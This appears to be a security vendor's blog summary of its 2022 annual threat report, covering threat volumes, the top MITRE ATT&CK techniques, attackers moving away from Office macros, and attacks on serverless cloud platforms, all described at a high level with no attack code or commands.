Expanding Attack Blueprints 2022 Annual Cybersecurity Report
The year 2022 — which was beset with economic turmoil, supply chain problems, and even a war — proved to be an arduous year for organizations not just offline, but online, too. While businesses worked overtime to keep their organizations protected against threats amid challenges and shortages, malicious actors also toiled around the clock to keep their criminal operations running. This is evidenced by the 146.4 billion threats we detected and blocked in 2022, a staggering 55.3% increase from the previous year’s numbers.
This blog entry discusses some of the most critical cybersecurity concerns that happened in 2022. The full report, which includes a more detailed view of last year’s cybersecurity threat landscape, is in our annual roundup, “Rethinking Tactics: 2022 Annual Security Report.”
Cybercriminals use old and new infiltration strategies
Top three ATT&CK techniques in 2022
Based on our observation of the top MITRE ATT&CK frameworks used in last year’s attacks, most malicious actors used similar methods in the initial phases. Upon closer investigation of the top three ATT&CK methods for 2022, we observed that cybercriminals are gaining access via remote services and proceed to abuse valid accounts through credential dumping.
o Adversaries may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
o Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services.
o Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Countering Microsoft’s move with malicious alternatives
Malicious actors have been known to abuse Microsoft Office documents by embedding malicious macros in their attacks. Typically, these malicious payloads are attached to socially engineered emails that attempt to lure victims into inadvertently downloading and executing malware.
In 2022, Microsoft blocked the execution of macro programs in Office documents to deter cybercriminals from abusing them as initial access vectors. This move caused a significant decline in the use of Office macros in attacks and prompted cybercriminals to find alternatives, such as HTML smuggling, malvertising, and living off the land tactics.
Malicious actors take aim at the cloud’s weak spots
Supply-chain attack on serverless platforms
As more organizations started shifting to serverless platforms to help them focus on creating better code and not on managing and securing resources, malicious actors were quick to follow suit.
Last year, we investigated the security of serverless platforms — ones that organizations use to oversee complex processes and host sensitive data — and identified weak spots that malicious actors can abuse. Malicious actors have started stealing cloud service credentials to get sensitive environmental variables and launching supply-chain attacks, such as when a Python library had its code changed to harvest sensitive variable content.